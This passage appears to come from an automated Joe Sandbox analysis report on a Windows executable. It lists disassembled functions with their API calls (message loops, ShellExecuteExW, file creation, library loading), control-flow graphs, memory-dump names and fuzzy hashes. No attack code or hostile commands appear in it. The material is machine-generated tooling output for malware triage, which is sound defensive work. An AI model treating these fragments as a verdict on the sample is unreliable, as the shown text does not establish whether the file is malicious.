                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9
                                                                                                                    • API String ID: 557298264-1836506137
                                                                                                                    • Opcode ID: e237b701f10cdbdbfad7b3cd3ee6480f3e57d7629a6206ae253d3d94318772b9
                                                                                                                    • Instruction ID: 1bc6f05bb485952ab53e3d95585cfaf749b3ec1241aa2ff78354356a6d197379
                                                                                                                    • Opcode Fuzzy Hash: e237b701f10cdbdbfad7b3cd3ee6480f3e57d7629a6206ae253d3d94318772b9
                                                                                                                    • Instruction Fuzzy Hash: 3C32B071900218EBCF29EF68DC4AAEA7BA5FF44304F40255AF905B7291EBB19D85CB50
                                                                                                                    Function 00E4D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E4B579
                                                                                                                      • Part of subcall function 00E4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4B58A
                                                                                                                      • Part of subcall function 00E4B568: IsDialogMessageW.USER32(0001047E,?), ref: 00E4B59E
                                                                                                                      • Part of subcall function 00E4B568: TranslateMessage.USER32(?), ref: 00E4B5AC
                                                                                                                      • Part of subcall function 00E4B568: DispatchMessageW.USER32(?), ref: 00E4B5B6
                                                                                                                    • GetDlgItem.USER32(00000068,00E8FCB8), ref: 00E4D4E8
                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00E4AF07,00000001,?,?,00E4B7B9,00E6506C,00E8FCB8,00E8FCB8,00001000,00000000,00000000), ref: 00E4D510
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E4D51B
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E635F4), ref: 00E4D529
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E4D53F
                                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E4D559
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E4D59D
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E4D5AB
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E4D5BA
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E4D5E1
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E643F4), ref: 00E4D5F0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                                    • Opcode ID: ec15c6ed61b05b4ed3535e0b95ec3a4164f0a3523ac391a6765a7a52013511d9
                                                                                                                    • Instruction ID: d30b18a46451d779bf30e132a829c9242775a09298b9b9d076285d6b28798da3
                                                                                                                    • Opcode Fuzzy Hash: ec15c6ed61b05b4ed3535e0b95ec3a4164f0a3523ac391a6765a7a52013511d9
                                                                                                                    • Instruction Fuzzy Hash: 5D31E275145342BFE301DF31EC4AFAB7FACEB92708F00050AF551B61A1EB658A488B76
                                                                                                                    Function 00E4D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 838 e4d78f-e4d7a7 call e4ec50 841 e4d7ad-e4d7b9 call e53e13 838->841 842 e4d9e8-e4d9f0 838->842 841->842 845 e4d7bf-e4d7e7 call e4fff0 841->845 848 e4d7f1-e4d7ff 845->848 849 e4d7e9 845->849 850 e4d801-e4d804 848->850 851 e4d812-e4d818 848->851 849->848 853 e4d808-e4d80e 850->853 852 e4d85b-e4d85e 851->852 852->853 854 e4d860-e4d866 852->854 855 e4d837-e4d844 853->855 856 e4d810 853->856 860 e4d86d-e4d86f 854->860 861 e4d868-e4d86b 854->861 858 e4d9c0-e4d9c2 855->858 859 e4d84a-e4d84e 855->859 857 e4d822-e4d82c 856->857 862 e4d82e 857->862 863 e4d81a-e4d820 857->863 865 e4d9c6 858->865 864 e4d854-e4d859 859->864 859->865 866 e4d882-e4d898 call e3b92d 860->866 867 e4d871-e4d878 860->867 861->860 861->866 862->855 863->857 868 e4d830-e4d833 863->868 864->852 872 e4d9cf 865->872 873 e4d8b1-e4d8bc call e3a231 866->873 874 e4d89a-e4d8a7 call e41fbb 866->874 867->866 869 e4d87a 867->869 868->855 869->866 875 e4d9d6-e4d9d8 872->875 884 e4d8be-e4d8d5 call e3b6c4 873->884 885 e4d8d9-e4d8dd 873->885 874->873 883 e4d8a9 874->883 878 e4d9e7 875->878 879 e4d9da-e4d9dc 875->879 878->842 879->878 882 e4d9de-e4d9e1 ShowWindow 879->882 882->878 883->873 884->885 888 e4d8e4-e4d8e6 885->888 888->878 889 e4d8ec-e4d8f9 888->889 890 e4d90c-e4d90e 889->890 891 e4d8fb-e4d902 889->891 893 e4d925-e4d944 call e4dc3b 890->893 894 e4d910-e4d919 890->894 891->890 892 e4d904-e4d90a 891->892 892->890 895 e4d97b-e4d987 CloseHandle 892->895 893->895 908 e4d946-e4d94e 893->908 894->893 902 e4d91b-e4d923 ShowWindow 894->902 896 e4d998-e4d9a6 895->896 897 e4d989-e4d996 call e41fbb 895->897 896->875 901 e4d9a8-e4d9aa 896->901 897->872 897->896 901->875 905 e4d9ac-e4d9b2 901->905 902->893 905->875 907 e4d9b4-e4d9be 905->907 907->875 908->895 909 e4d950-e4d961 GetExitCodeProcess 908->909 909->895 910 e4d963-e4d96d 909->910 911 e4d974 910->911 912 e4d96f 910->912 911->895 912->911
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00E4D7AE
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00E4D8DE
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00E4D91D
                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00E4D959
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E4D97F
                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 00E4D9E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                    • String ID: .exe$.inf$PDu<$h$r
                                                                                                                    • API String ID: 36480843-2155249188
                                                                                                                    • Opcode ID: ae8195c4639facdf3f10110d3e179eed705cc1fa9929743194aead286ea633be
                                                                                                                    • Instruction ID: 4445a4c5fad3d48353e5f3e91502934821b14e6d7077f07bfe214e20dae2c7af
                                                                                                                    • Opcode Fuzzy Hash: ae8195c4639facdf3f10110d3e179eed705cc1fa9929743194aead286ea633be
                                                                                                                    • Instruction Fuzzy Hash: A351C37050C3809EDB219B25BC457BBBBE5AF85748F04241EF6C5F7191E7B18988CB52
                                                                                                                    Function 00E5A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 913 e5a95b-e5a974 914 e5a976-e5a986 call e5ef4c 913->914 915 e5a98a-e5a98f 913->915 914->915 922 e5a988 914->922 917 e5a991-e5a999 915->917 918 e5a99c-e5a9c0 MultiByteToWideChar 915->918 917->918 920 e5a9c6-e5a9d2 918->920 921 e5ab53-e5ab66 call e4fbbc 918->921 923 e5a9d4-e5a9e5 920->923 924 e5aa26 920->924 922->915 927 e5aa04-e5aa15 call e58e06 923->927 928 e5a9e7-e5a9f6 call e62010 923->928 926 e5aa28-e5aa2a 924->926 930 e5aa30-e5aa43 MultiByteToWideChar 926->930 931 e5ab48 926->931 927->931 938 e5aa1b 927->938 928->931 941 e5a9fc-e5aa02 928->941 930->931 935 e5aa49-e5aa5b call e5af6c 930->935 936 e5ab4a-e5ab51 call e5abc3 931->936 943 e5aa60-e5aa64 935->943 936->921 942 e5aa21-e5aa24 938->942 941->942 942->926 943->931 945 e5aa6a-e5aa71 943->945 946 e5aa73-e5aa78 945->946 947 e5aaab-e5aab7 945->947 946->936 950 e5aa7e-e5aa80 946->950 948 e5ab03 947->948 949 e5aab9-e5aaca 947->949 953 e5ab05-e5ab07 948->953 951 e5aae5-e5aaf6 call e58e06 949->951 952 e5aacc-e5aadb call e62010 949->952 950->931 954 e5aa86-e5aaa0 call e5af6c 950->954 957 e5ab41-e5ab47 call e5abc3 951->957 967 e5aaf8 951->967 952->957 965 e5aadd-e5aae3 952->965 953->957 958 e5ab09-e5ab22 call e5af6c 953->958 954->936 969 e5aaa6 954->969 957->931 958->957 970 e5ab24-e5ab2b 958->970 971 e5aafe-e5ab01 965->971 967->971 969->931 972 e5ab67-e5ab6d 970->972 973 e5ab2d-e5ab2e 970->973 971->953 974 e5ab2f-e5ab3f WideCharToMultiByte 972->974 973->974 974->957 975 e5ab6f-e5ab76 call e5abc3 974->975 975->936
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E55695,00E55695,?,?,?,00E5ABAC,00000001,00000001,2DE85006), ref: 00E5A9B5
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E5ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00E5AA3B
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E5AB35
                                                                                                                    • __freea.LIBCMT ref: 00E5AB42
                                                                                                                      • Part of subcall function 00E58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E5CA2C,00000000,?,00E56CBE,?,00000008,?,00E591E0,?,?,?), ref: 00E58E38
                                                                                                                    • __freea.LIBCMT ref: 00E5AB4B
                                                                                                                    • __freea.LIBCMT ref: 00E5AB70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1414292761-0
                                                                                                                    • Opcode ID: e414783508b58af368b744f3ad0aecbce0d2defed8edb828fbe3110d5f786a3a
                                                                                                                    • Instruction ID: 0f3f02850dfbbfacb1df14ad77057d0ca80c0a4e4e5dbb5f733031fe01ebe087
                                                                                                                    • Opcode Fuzzy Hash: e414783508b58af368b744f3ad0aecbce0d2defed8edb828fbe3110d5f786a3a
                                                                                                                    • Instruction Fuzzy Hash: 0151C072A00216AFDB258E64DC41EABB7ABEB44755B195B3CFC04F7141EB34DC48C6A2
                                                                                                                    Function 00E53B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 978 e53b72-e53b7c 979 e53bee-e53bf1 978->979 980 e53bf3 979->980 981 e53b7e-e53b8c 979->981 982 e53bf5-e53bf9 980->982 983 e53b95-e53bb1 LoadLibraryExW 981->983 984 e53b8e-e53b91 981->984 987 e53bb3-e53bbc GetLastError 983->987 988 e53bfa-e53c00 983->988 985 e53b93 984->985 986 e53c09-e53c0b 984->986 990 e53beb 985->990 986->982 991 e53be6-e53be9 987->991 992 e53bbe-e53bd3 call e56088 987->992 988->986 989 e53c02-e53c03 FreeLibrary 988->989 989->986 990->979 991->990 992->991 995 e53bd5-e53be4 LoadLibraryExW 992->995 995->988 995->991
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00E53C35,?,?,00E92088,00000000,?,00E53D60,00000004,InitializeCriticalSectionEx,00E66394,InitializeCriticalSectionEx,00000000), ref: 00E53C03
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID: api-ms-
                                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                                    • Opcode ID: bc17ada843985430bd72f5d849fc5018c655fe693b6fefa85382f8a5388e90fa
                                                                                                                    • Instruction ID: 590c7cb7f0a044b5509bdb7d34285385288985ef551bf961735becbf5fe7902f
                                                                                                                    • Opcode Fuzzy Hash: bc17ada843985430bd72f5d849fc5018c655fe693b6fefa85382f8a5388e90fa
                                                                                                                    • Instruction Fuzzy Hash: B9110636A45220ABCF628B79AC41B5E77A49F017F6F211611ED11FB290E7B1EF0C86D0
                                                                                                                    Function 00E4AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E40836
                                                                                                                      • Part of subcall function 00E4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E3F2D8,Crypt32.dll,00000000,00E3F35C,?,?,00E3F33E,?,?,?), ref: 00E40858
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00E4AC2F
                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E4AC66
                                                                                                                    • SHGetMalloc.SHELL32(00E78438), ref: 00E4AC70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                    • String ID: riched20.dll$3Ro
                                                                                                                    • API String ID: 3498096277-3613677438
                                                                                                                    • Opcode ID: f61c47c6b8d4d5b23ce4e4ff5758d80303ac948ebf8e0554d55240d4d5a3f4a0
                                                                                                                    • Instruction ID: 5a584bbd681201e24e2911d2ef731cbcd41f3cc41989d9540796445145e51e4f
                                                                                                                    • Opcode Fuzzy Hash: f61c47c6b8d4d5b23ce4e4ff5758d80303ac948ebf8e0554d55240d4d5a3f4a0
                                                                                                                    • Instruction Fuzzy Hash: 4DF0F9B5900209AFCB10AFAAD9499AFFBFCEF94700F00415BA815B2251DBB456058BA1
                                                                                                                    Function 00E398E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1000 e398e0-e39901 call e4ec50 1003 e39903-e39906 1000->1003 1004 e3990c 1000->1004 1003->1004 1005 e39908-e3990a 1003->1005 1006 e3990e-e3991f 1004->1006 1005->1006 1007 e39921 1006->1007 1008 e39927-e39931 1006->1008 1007->1008 1009 e39933 1008->1009 1010 e39936-e39943 call e36edb 1008->1010 1009->1010 1013 e39945 1010->1013 1014 e3994b-e3996a CreateFileW 1010->1014 1013->1014 1015 e399bb-e399bf 1014->1015 1016 e3996c-e3998e GetLastError call e3bb03 1014->1016 1018 e399c3-e399c6 1015->1018 1021 e399c8-e399cd 1016->1021 1025 e39990-e399b3 CreateFileW GetLastError 1016->1025 1020 e399d9-e399de 1018->1020 1018->1021 1023 e399e0-e399e3 1020->1023 1024 e399ff-e39a10 1020->1024 1021->1020 1022 e399cf 1021->1022 1022->1020 1023->1024 1026 e399e5-e399f9 SetFileTime 1023->1026 1027 e39a12-e39a2a call e40602 1024->1027 1028 e39a2e-e39a39 1024->1028 1025->1018 1029 e399b5-e399b9 1025->1029 1026->1024 1027->1028 1029->1018
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00E37760,?,00000005,?,00000011), ref: 00E3995F
                                                                                                                    • GetLastError.KERNEL32(?,?,00E37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E3996C
                                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00E37760,?,00000005,?), ref: 00E399A2
                                                                                                                    • GetLastError.KERNEL32(?,?,00E37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E399AA
                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00E37760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E399F9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1999340476-0
                                                                                                                    • Opcode ID: e75432360d31bd7ee364cbea27bb0078b3bcffd56b70d300f247c832fbde818f
                                                                                                                    • Instruction ID: fa20468aa18e3af9472b639da72aa85df3c465c0079d68b2cc107ebc7cf2cbee
                                                                                                                    • Opcode Fuzzy Hash: e75432360d31bd7ee364cbea27bb0078b3bcffd56b70d300f247c832fbde818f
                                                                                                                    • Instruction Fuzzy Hash: 073104305447456FE7309F24DC8ABDABFD4BB84324F101B19F9A1A61D2D7F4A948CB91
                                                                                                                    Function 00E4B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1059 e4b568-e4b581 PeekMessageW 1060 e4b583-e4b597 GetMessageW 1059->1060 1061 e4b5bc-e4b5be 1059->1061 1062 e4b5a8-e4b5b6 TranslateMessage DispatchMessageW 1060->1062 1063 e4b599-e4b5a6 IsDialogMessageW 1060->1063 1062->1061 1063->1061 1063->1062
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E4B579
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4B58A
                                                                                                                    • IsDialogMessageW.USER32(0001047E,?), ref: 00E4B59E
                                                                                                                    • TranslateMessage.USER32(?), ref: 00E4B5AC
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00E4B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1266772231-0
                                                                                                                    • Opcode ID: 26419ff562f64bbb2eb8279dacfca854fba960c3ed3c0c3c9f47377c701eeb5b
                                                                                                                    • Instruction ID: fa57f78fe31fe22491fcc50fdd7f0998a8564636f8285b8fd50e20d7fbc10307
                                                                                                                    • Opcode Fuzzy Hash: 26419ff562f64bbb2eb8279dacfca854fba960c3ed3c0c3c9f47377c701eeb5b
                                                                                                                    • Instruction Fuzzy Hash: 8CF06D71A0121AAF8B209BF6AC4DDDBBFBCEF056957404416B519E2050EB78D609CBB0
                                                                                                                    Function 00E4ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1064 e4abab-e4abca GetClassNameW 1065 e4abf2-e4abf4 1064->1065 1066 e4abcc-e4abe1 call e41fbb 1064->1066 1068 e4abf6-e4abf9 SHAutoComplete 1065->1068 1069 e4abff-e4ac01 1065->1069 1071 e4abf1 1066->1071 1072 e4abe3-e4abef FindWindowExW 1066->1072 1068->1069 1071->1065 1072->1071
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00E4ABC2
                                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00E4ABF9
                                                                                                                      • Part of subcall function 00E41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E3C116,00000000,.exe,?,?,00000800,?,?,?,00E48E3C), ref: 00E41FD1
                                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00E4ABE9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                    • String ID: EDIT
                                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                                    • Opcode ID: 3fad67910258606defafe6eabb30710f8b44715e1961c854412f85146c53005d
                                                                                                                    • Instruction ID: fe766d052ffda82931610a43ec3158cde3c9b50cacdbd58144ab76f8d40d0a7b
                                                                                                                    • Opcode Fuzzy Hash: 3fad67910258606defafe6eabb30710f8b44715e1961c854412f85146c53005d
                                                                                                                    • Instruction Fuzzy Hash: 4FF082327412287ADB305A25AC0AF9B76AC9F46B50F484063BA05F61C0D760EE4585B6
                                                                                                                    Function 00E4DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
